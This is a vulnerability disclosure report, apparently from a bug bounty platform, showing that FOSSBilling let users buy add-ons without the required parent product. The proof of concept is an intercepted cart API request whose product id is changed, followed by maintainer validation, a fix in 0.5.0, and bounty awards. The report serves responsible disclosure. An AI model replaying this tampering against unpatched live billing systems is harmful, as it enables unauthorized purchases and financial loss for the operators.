Users can order Add-Ons Separately in fossbilling/fossbilling

Valid

Reported on

Jun 11th 2023


Description

I find a requirement that addons must be purchased in conjunction with a product. However, a vulnerability has been discovered where an attacker can modify the product ID during the order process, allowing them to bypass the main product order requirement and directly purchase the addon.

Proof of Concept

1 user orders the product

2 using burpsuit hijack the request

POST /index.php?_url=/api/guest/cart/add_item HTTP/1.1
Host: localhost
Content-Length: 58
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/orderbutton?order=8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: BOXCLR=e%3DdXNlcjNAdGVzdC5jb20%3D%26p%3DJDJ5JDEwJEltbDNnQXl0di8xdy5wZFpWQW9pNi40UVhsSnd3R2h5OENCT0VCYVp3ZmhGc2paU3N5UzJx; ADMIDIO_admidio_adm_SESSION_ID=28c355e130917b8a2f817792256db866; ADMIDIO_admidio_adm_cookieconsent_status=dismiss; PHPSESSID=9fd364ab4e45a218a605f6129bfec942; BBLANG=en_US
Connection: close

CSRFToken=593265e9721d74ae839c486bc5a96102&form_id=1&id=6&&multiple=1&id=1

3 change the id = 1 as id =6

4 id = 6 means that id of one addon is 6

5 send reqeust and find success.

Impact

This vulnerability could potentially result in unauthorized purchases and financial loss .

We are processing your report and will contact the fossbilling team within 24 hours. 9 months ago
Belle Aerni validated this vulnerability 9 months ago

Thanks for the report. I was able to valid this and I've proposed changes which will both prevent add-ons from being added to the cart without an associated product and it introduces checks to ensure the add-ons are valid for the selected product.

https://github.com/FOSSBilling/FOSSBilling/pull/1313

lujiefsi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Belle Aerni marked this as fixed in 0.5.0 with commit b65a75 9 months ago
Belle Aerni has been awarded the fix bounty
This vulnerability has now been published 9 months ago
to join this conversation